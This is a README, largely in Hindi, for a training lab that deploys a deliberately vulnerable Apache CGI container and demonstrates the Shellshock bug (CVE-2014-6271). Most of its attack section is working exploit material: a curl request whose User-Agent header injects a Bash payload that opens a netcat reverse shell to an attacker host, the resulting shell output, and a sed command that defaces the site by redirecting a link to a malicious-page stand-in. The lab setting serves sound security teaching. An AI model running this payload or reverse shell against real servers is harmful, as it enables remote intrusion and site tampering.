
This Repo is PoC environment of CVE-2014-6271(https://nvd.nist.gov/vuln/detail/cve-2014-6271).
यह रिपॉजिटरी CVE-2014-6271 का PoC वातावरण है।
आप apache2 कंटेनर इमेज का उपयोग करके कमजोरी सहित वेब सेवा तैनात कर सकते हैं।
Dockerfile से असुरक्षित इमेज बनाएँ।
# docker build -t cve-2014-6271-apache-debian:buster ./insecure-base-image/
# docker build -t training-website-poc:v1.0 ./web-insecure/
Docker
PoC कंटेनर को डॉकर कंटेनर के रूप में तैनात करें।
# docker run -d -p 8080:80 training-website-poc:v1.0
Kubernetes
PoC कंटेनर को k8s पॉड और सेवा के रूप में तैनात करें।
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-pod.yml
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-svc.yml
तैनाती पूरी होने के बाद, आप निम्न URL को ब्राउज़र से एक्सेस करके वेब पृष्ठ ब्राउज़ कर सकते हैं।
आप वेब पृष्ठ के नीचे "Click!" लिंक पर क्लिक करके k8s लैब वातावरण तक पहुँच सकते हैं।
Docker
http://<docker host IP>:8080
Kubernetes
http://<k8s service endpoint>:<k8s service port>
इस प्रदर्शन में, आप CVE-2014-6271 की कमजोरी का शोषण करके हमलावर होस्ट (कंटेनर के बाहर) से वेब पृष्ठ बदल सकते हैं।
हमलावर होस्ट से ये कमांड निष्पादित करें।
टर्मिनल 1
# nc -nvlp 5050
टर्मिनल 2
※इस मामले में, हम PoC कंटेनर को Docker का उपयोग करके तैनात करते हैं। Kubernetes के मामले में, URL http://<k8s service endpoint>:<k8s service port> होना चाहिए।
# curl -H "user-agent: () { :; }; echo; /bin/nc -e /bin/bash <Attacker Host IP> 5050" http://<docker host IP>:8080/cgi-bin/vulnerable
उसके बाद, आप देख सकते हैं कि PoC कंटेनर का /bin/bash टर्मिनल 1 में निष्पादित किया जा सकता है।
Listening on 0.0.0.0 5050
Connection received on 172.17.0.2 38926
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1000(wheel)
pwd
/usr/lib/cgi-bin
वेब पृष्ठ के "Click!" लिंक को बदलें।
इस मामले में, हम दुर्भावनापूर्ण लिंक के लिए डमी पृष्ठ का उपयोग करते हैं।
sudo sed -i -e 's/https\:\/\/www.katacoda.com\/courses\/kubernetes/danger.html/' /var/www/html/index.html
वेब पृष्ठ को पुनः एक्सेस करें और वेब पृष्ठ के नीचे "Click!" लिंक पर क्लिक करें।
http://<docker host IP>:8080
https://github.com/hmlio/vaas-cve-2014-6271
https://github.com/opsxcq/exploit-CVE-2014-6271